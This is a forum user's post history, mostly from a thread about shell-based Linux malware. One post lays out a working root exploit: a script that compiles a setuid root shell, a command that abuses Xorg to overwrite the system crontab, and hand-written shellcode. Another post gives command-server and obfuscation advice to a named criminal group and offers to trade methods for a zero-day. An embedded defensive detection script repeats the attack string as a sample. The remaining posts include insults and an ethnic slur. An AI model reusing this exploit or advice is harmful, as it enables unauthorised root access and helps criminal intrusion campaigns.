Posts by Sophie
-
2021-09-25 at 6:07 PM UTC in Sh/Bash based malware for *Nix.
It's not called exploits for nothing (n_n")
-
2021-09-25 at 6:05 PM UTC in Sh/Bash based malware for *Nix.
If you look closely at this part:
cat << EOF > /tmp/x_orgasm
cp /bin/sh /usr/local/bin/pwned ##!!##_1
echo "main(){setuid(0);setgid(0);system(\"/bin/sh\");}" > /tmp/pwned.c
gcc /tmp/pwned.c -o /usr/local/bin/pwned ##!!##_2
chmod 4777 /usr/local/bin/pwned
EOF
You can tell that the operation above writes out everything between EOF to the /tmp directory, after which it's made executable with chmod +x. That means it can be run as a shell script.
Here we are making sure that cronjob related to Xorg which has the permissions required will start the script in /tmp with the permissions we need.
cd /etc
Xorg -fp "* * * * * root /tmp/x_orgasm" -logfile crontab :1 & ##!!##_3
sleep 5
pkill Xorg
Once the script is executed with the new permissions we can do the operations defined there without issue.
Even if something goes wrong i write this:
global _start
section .text
_start:
push 59
pop rax
cdq
push rdx
mov rbx, 0x6363672f6e69622f
push rbx
mov rbx, 0x7273752f2f2f2f2f
push rbx
push rsp
pop rdi
push rdx
mov rbx, 0xffffffff9cd19b9a
not rbx
push rbx
mov rbx, 0x91888fd08f928bd0
not rbx
push rbx
push rsp
pop r8
push rdx
mov rbx, 0xffffffffffff90d2
not rbx
push rbx
push rsp
pop r9
push rdx
mov rbx, 0xffffffff9b9a9188
not rbx
push rbx
mov rbx, 0x8fd091969dd0939e
not rbx
push rbx
mov rbx, 0x9c9093d08d8c8ad0
not rbx
push rbx
push rsp
pop r10
push rdx
push rsp
pop rdx
push r10
push r9
push r8
push rdi
push rsp
pop rsi
syscall
What that does is invoke gcc with execve with UID 0, so the shell we wrote out with
echo "main(){setuid(0);setgid(0);system(\"/bin/sh\");}" > /tmp/pwned.c
gets compiled the way we want to regardless of system permissions.
-
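A defender-side check for the Xorg invocation shown in the post above, as an added example that is not part of the original post: it flags Xorg command lines whose -logfile resolves outside the usual log directories or whose -fp value parses as a cron entry. The "cwd|command line" record format, the allowed log prefixes and the function names are assumptions.

```sh
#!/bin/sh
# Added detection example. Record format, allowed log prefixes and function
# names are assumptions; the sample records below are constructed.

resolve_path() {   # $1 = process cwd, $2 = path as given on the command line
    case "$2" in
        /*) printf '%s\n' "$2" ;;
        *)  printf '%s/%s\n' "${1%/}" "$2" ;;
    esac
}

# Print why an Xorg command line looks abusive; return 0 only if it does.
check_xorg_exec() {   # $1 = cwd, $2 = command line (arguments space-joined)
    cwd=$1; cmd=$2; reasons=
    set -f; set -- $cmd; set +f          # split into words without globbing
    case "${1##*/}" in Xorg|X) ;; *) return 1 ;; esac
    while [ $# -gt 1 ]; do
        if [ "$1" = "-logfile" ]; then
            log=$(resolve_path "$cwd" "$2")
            case "$log" in
                *..*) reasons="$reasons logfile-traversal:$log" ;;
                /var/log/*|/home/*/.local/share/xorg/*) ;;   # usual locations
                *) reasons="$reasons logfile-outside-logdir:$log" ;;
            esac
        fi
        shift
    done
    # A font path shaped like "five schedule fields, user, absolute path" is
    # a cron entry headed for the log file, not a font directory.
    if printf '%s\n' "$cmd" |
        grep -Eq -- '-fp +([-*0-9,/]+ +){5}[a-z_][a-z0-9_-]* +/'; then
        reasons="$reasons fp-looks-like-cron-entry"
    fi
    [ -n "$reasons" ] && printf '%s\n' "${reasons# }"
}

scan_records() {   # stdin: "cwd|command line" per line; prints flagged ones
    while IFS='|' read -r rcwd rcmd; do
        if why=$(check_xorg_exec "$rcwd" "$rcmd"); then
            printf 'ALERT cwd=%s reasons=[%s] cmd=%s\n' "$rcwd" "$why" "$rcmd"
        fi
    done
}

SAMPLE='/|/usr/lib/xorg/Xorg -fp /usr/share/fonts/X11/misc -logfile /var/log/Xorg.0.log :0
/etc|Xorg -fp * * * * * root /tmp/x_orgasm -logfile crontab :1
/home/al|vim notes.txt'

printf '%s\n' "$SAMPLE" | scan_records
```

Only the second sample record raises an alert; the first is an ordinary display-server start and the third is not Xorg at all.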
2021-09-25 at 4:48 PM UTC in Sh/Bash based malware for *Nix.
-
2021-09-25 at 4:23 PM UTC in Sh/Bash based malware for *Nix.
Also TeamTNT, if you're reading this. Don't download your payloads from a C2 server that literally has the name of the Operation in the domain. And, you guys need to obfuscate that shell script. I got a couple really good ways among my TTPs but if i share them they won't be as effective any more.
I can design a new Obfuscation method however. And you guys should be able to as well, if you can't i'll trade a custom designed method, for something of equal value. Preferably 0day. Ok admittedly that's a steep price.
All of this is for legitimate research purposes of course.
edit: Oops * shell script not shell code lol
-
2021-09-25 at 4:11 PM UTC in Sh/Bash based malware for *Nix.
-
2021-09-25 at 1:12 PM UTC in Sh/Bash based malware for *Nix.
I'm an inspiration to Threat Actors all around the world.
https://cybersecurity.att.com/blogs/labs-research/teamtnt-with-new-campaign-aka-chimaera
Sh/Bash based malware is the future of loonix malware. Using native utils for offensive operations is almost always superior to shipping in a whole ass malware, especially with regards to Linux, no compatibility issues. It's great.
-
2021-09-22 at 4:34 AM UTC in Why has this place become Who's on First
Well Totse Quick Mix 9000 i try to do my part, with threads about splosives and writing about some of the cyber shenanigans i get up to in T&T.
But those are just genuine interests. You could even say passions especially as far as the computer science stuff is concerned.
-
2021-09-22 at 4:30 AM UTC in In a few more years New Zealand will cease to exist.
-
2021-09-22 at 4:25 AM UTC in Do you spit shine yer shooz?
The only shoes i own that need shining are leather Hugo Boss shoes and my dress shoes that i wear if i have to wear a suit and tie. Them's the typa shoes you don't just shine with spit. You use special polish.
-
2021-09-22 at 4:13 AM UTC in Too bad devils can’t die in a fire
Dying in a blaze of glory huh? Make sure it's an infernal fire storm.
-
2021-09-22 at 12:02 AM UTC in Am I the God or the Devil?
You're just some loser. Thinking you are God or the Devil for that matter is a level of narcissism hard to comprehend. Sure you can have a high opinion of yourself, but you have never in your life done a single thing that would even warrant being proud of. Let alone thinking you are God.
Your only accomplishment in life is not having died from complications due to alcoholism.
-
2021-09-20 at 9:07 AM UTC in I had another weird dream. explain this to me
Piss boner? Is that an old man prostate thing? It's obviously different to morning wood. Anyway, surface level would suggest you have some inner turmoil considering your views on your own masculinity.
-
2021-09-20 at 9:02 AM UTC in Its a little bit funny guys (about older women)
You're really overcompensating for your noncery.
-
2021-09-20 at 8:20 AM UTC in tunnel boring activity at walmart?
Didn't know they sold kids at Walmart. How convenient.
-
2021-09-20 at 8:12 AM UTC in It's smile cookie season
Do you have experience with this Vinnie?
-
2021-09-20 at 8:08 AM UTC in It's smile cookie season
-
2021-09-20 at 7:51 AM UTC in Option to disable thanks feature
-
2021-09-20 at 7:49 AM UTC in Panic attacks
-
2021-09-20 at 7:47 AM UTC in Panic attacks
Hey Grylls, what typa foreign are you? you look like an AY-rab to me.
-
2021-09-20 at 7:46 AM UTC in Fona 9-19-2021